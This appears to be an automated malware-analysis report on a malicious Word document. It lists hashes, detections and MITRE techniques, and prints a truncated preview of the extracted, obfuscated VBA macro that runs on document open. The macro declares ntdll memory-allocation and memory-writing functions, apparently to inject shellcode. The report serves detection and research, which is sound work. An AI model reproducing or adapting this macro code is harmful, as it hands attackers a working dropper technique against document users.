Office (OLE) malware analysis — malicious · 59dc090596bd3ecc

MALICIOUS

Office (OLE)

194.5 KB Created: 2017-11-07 14:51:00 Authoring application: Microsoft Office Word First seen: 2017-11-13

MD5: 51de8a9ca8e5a685c300dfbfca865ff0 SHA-1: f2d8477678163031779adf0ccd79ca845f29f9b5 SHA-256: 59dc090596bd3eccce006aba8ed618487c125975ac101e50a926bd5ef10cbdd4

122 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is a Microsoft Word document containing VBA macros, specifically a Document_Open macro, which is a common technique for initial execution. The VBA code includes declarations for memory allocation and writing functions from ntdll and Kernel32, suggesting it attempts to manipulate memory or execute shellcode. The presence of the ClamAV detection 'Doc.Dropper.Agent-6367788-0' further indicates its dropper functionality. The macro's intent is to download and execute a second-stage payload, though the specific URL or mechanism is obfuscated.

Heuristics 4

ClamAV: Doc.Dropper.Agent-6367788-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6367788-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 34695 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	34695 bytes
SHA-256: `703c7e6754d3acbee009e9f400cb8bf8f8ede429b75a542de7559820e4a4e6ae`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() Dim deaconship As Variant Dim stoneblind As String barratrous = straggly greenness = "modernism" disbar exhibition = 70 + 7 Pmt 0, exhibition, 23427, 52504, 3 End Sub Attribute VB_Name = "aeromancy" #If Not (88 - 11 * 8) * 30 < (Win64) And (13 * 3 + 5) > (8 - 3 * 1) Then Public Declare Function anthocerotaceae _ Lib "ntdll " alias _ "NtAllocateVirtualMemory" (beninese As Long, marlin As Long, ByVal arcade As Long, conciliationByVal As Long, methodical As Long, ByVal awakened As Long) As Long Public Declare Function discouraged _ Lib "ntdll " alias _ "NtWriteVirtualMemory" (ByVal perfumer As Any, ByVal pericranium As Any, ByVal vet As Any, ByVal drudging As Any, ByVal noonday As Any) As Long Public Declare Function prophesy Lib "Kernel32 " alias "CreateTimerQueueTimer" (duval As Any, ByVal brogue As Any, ByVal perdidit As Any, ByVal placidly As Any, ByVal atlanta As Any, ByVal moles As Any, ByVal tecta As Any) As Long #End If #If (13 * 3 + 5) > (8 - 3 * 1) And (88 - 11 * 8) * 30 < (Win64) Then Public Declare PtrSafe Function anthocerotaceae _ Lib "ntdll " Alias _ "NtAllocateVirtualMemory" (ameboid As LongPtr, cleanse As LongPtr, ByVal absquatulate As LongPtr, monsieurByVal As LongPtr, nonionic As LongPtr, ByVal ode As LongPtr) As LongPtr Public Declare PtrSafe Function antecedent Lib "Shlwapi.dll " Alias "SleepConditionVariableSRW" (ByVal adiantaceae As Any, associational As Any, mastitis As Any, calomel As Any) As LongPtr Public Declare PtrSafe Function peptide Lib "Shlwapi.dll " Alias "GetOverlappedResult" (ByVal dreyfus As Any, noncombustible As Any, click As Any, chufa As Any) As LongPtr Public Declare PtrSafe Function discouraged _ Lib "ntdll " Alias _ "NtWriteVirtualMemory" (ByVal ruler As Any, ByVal ableism As Any, ByVal tasmanian As Any, ByVal cataract As Any, ByVal ergot As Any) As LongPtr Public Declare PtrSafe Function prophesy Lib "Kernel32" Alias _ "CreateTimerQueueTimer" (boatmanship As Any, ByVal noncyclic As Any, ByVal sainthood As Any, ByVal biskek As Any, ByVal mothball As Any, ByVal ametropic As Any, ByVal headmost As Any) As Long #End If Attribute VB_Name = "seasonably" Attribute VB_Base = "0{E0936F7E-9C38-4596-8AF7-A18A55113082}{A8B21F1C-CD40-4DD3-B6D0-8DAE611197A2}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "boxits" Function guardian(satellite) Dim eisen As Variant Dim saintship As String Dim tastelessly As Variant Dim cholangiography As String #If (13 * 3 + 5) > (8 - 3 * 1) And (88 - 11 * 8) * 30 < (Win64) Then Dim balefully As Byte Dim cuspidation As LongPtr cyclostyle = 10 - 128 + 126 Dim anarhichas As LongPtr Dim neutralism As Variant Dim abuzz As String Dim arithmetician As LongPtr Dim trow As Variant #ElseIf (13 * 3 + 5) > (8 - 3 * 1) And Not (88 - 11 * 8) * 30 < (Win64) Then Dim cuspidation As Long cyclostyle = 105 - 16 - 85 Dim anarhichas As Long Dim arithmetician As Long #End If finds = VarPtr(cuspidation) ethnic = hence(finds, VarPtr(satellite) + 8, cyclostyle) ostryopsis = 98 - 12 - 87 anarhichas = 50 - 118 + 68 pork = 121 - 69 - 52 arithmetician = 96 - 75 + 9755 traces = 39 - 13 + 4070 unfoldment = 54 - 70 + 80 lover = anthocerotaceae(ByVal ostryopsis, _ anarhichas, _ ByVal pork, arithmetician, ByVal traces, _ ByVal unfoldment) selfappointed = halogeton hence anarhichas, cuspidation, 7 - 89 + 5965 bigbellied = 40 + 10 Pmt 0, bigbellied, 36445, 18072, 6 guardian = anarhichas End Function Function hence(roulette, trite, calling) #If (13 * 3 + 5) > (8 - 3 * 1) And (88 - 11 * 8) * 30 < (Win64) Then Dim pr ... (truncated)

SHA-256: 703c7e6754d3acbee009e9f400cb8bf8f8ede429b75a542de7559820e4a4e6ae

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Private Sub Document_Open()
Dim deaconship As Variant
Dim stoneblind As String
barratrous = straggly
greenness = "modernism"
disbar
exhibition = 70 + 7
 Pmt 0, exhibition, 23427, 52504, 3
End Sub


Attribute VB_Name = "aeromancy"
#If Not (88 - 11 * 8) * 30 < (Win64) And (13 * 3 + 5) > (8 - 3 * 1) Then
Public Declare Function anthocerotaceae _
Lib "ntdll   " alias _
"NtAllocateVirtualMemory" (beninese As Long, marlin As Long, ByVal arcade As Long, conciliationByVal As Long, methodical As Long, ByVal awakened As Long) As Long
Public Declare Function discouraged _
Lib "ntdll   " alias _
"NtWriteVirtualMemory" (ByVal perfumer As Any, ByVal pericranium As Any, ByVal vet As Any, ByVal drudging As Any, ByVal noonday As Any) As Long
Public Declare Function prophesy Lib "Kernel32   " alias "CreateTimerQueueTimer" (duval As Any, ByVal brogue As Any, ByVal perdidit As Any, ByVal placidly As Any, ByVal atlanta As Any, ByVal moles As Any, ByVal tecta As Any) As Long
#End If
#If (13 * 3 + 5) > (8 - 3 * 1) And (88 - 11 * 8) * 30 < (Win64) Then
Public Declare PtrSafe Function anthocerotaceae _
Lib "ntdll   " Alias _
"NtAllocateVirtualMemory" (ameboid As LongPtr, cleanse As LongPtr, ByVal absquatulate As LongPtr, monsieurByVal As LongPtr, nonionic As LongPtr, ByVal ode As LongPtr) As LongPtr
Public Declare PtrSafe Function antecedent Lib "Shlwapi.dll  " Alias "SleepConditionVariableSRW" (ByVal adiantaceae As Any, associational As Any, mastitis As Any, calomel As Any) As LongPtr
Public Declare PtrSafe Function peptide Lib "Shlwapi.dll  " Alias "GetOverlappedResult" (ByVal dreyfus As Any, noncombustible As Any, click As Any, chufa As Any) As LongPtr
Public Declare PtrSafe Function discouraged _
Lib "ntdll   " Alias _
"NtWriteVirtualMemory" (ByVal ruler As Any, ByVal ableism As Any, ByVal tasmanian As Any, ByVal cataract As Any, ByVal ergot As Any) As LongPtr
Public Declare PtrSafe Function prophesy Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (boatmanship As Any, ByVal noncyclic As Any, ByVal sainthood As Any, ByVal biskek As Any, ByVal mothball As Any, ByVal ametropic As Any, ByVal headmost As Any) As Long
#End If


Attribute VB_Name = "seasonably"
Attribute VB_Base = "0{E0936F7E-9C38-4596-8AF7-A18A55113082}{A8B21F1C-CD40-4DD3-B6D0-8DAE611197A2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "boxits"
Function guardian(satellite)
Dim eisen As Variant
Dim saintship As String
Dim tastelessly As Variant
Dim cholangiography As String
#If (13 * 3 + 5) > (8 - 3 * 1) And (88 - 11 * 8) * 30 < (Win64) Then
Dim balefully As Byte
Dim cuspidation As LongPtr
cyclostyle = 10 - 128 + 126
Dim anarhichas As LongPtr
Dim neutralism As Variant
Dim abuzz As String
Dim arithmetician As LongPtr
Dim trow As Variant
#ElseIf (13 * 3 + 5) > (8 - 3 * 1) And Not (88 - 11 * 8) * 30 < (Win64) Then
Dim cuspidation As Long
cyclostyle = 105 - 16 - 85
Dim anarhichas As Long
Dim arithmetician As Long
#End If
finds = VarPtr(cuspidation)
ethnic = hence(finds, VarPtr(satellite) + 8, cyclostyle)
ostryopsis = 98 - 12 - 87
anarhichas = 50 - 118 + 68
pork = 121 - 69 - 52
arithmetician = 96 - 75 + 9755
traces = 39 - 13 + 4070
unfoldment = 54 - 70 + 80
lover = anthocerotaceae(ByVal ostryopsis, _
anarhichas, _
ByVal pork, arithmetician, ByVal traces, _
ByVal unfoldment)
selfappointed = halogeton
hence anarhichas, cuspidation, 7 - 89 + 5965
bigbellied = 40 + 10
Pmt 0, bigbellied, 36445, 18072, 6
guardian = anarhichas
End Function

Function hence(roulette, trite, calling)
#If (13 * 3 + 5) > (8 - 3 * 1) And (88 - 11 * 8) * 30 < (Win64) Then
Dim pr
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.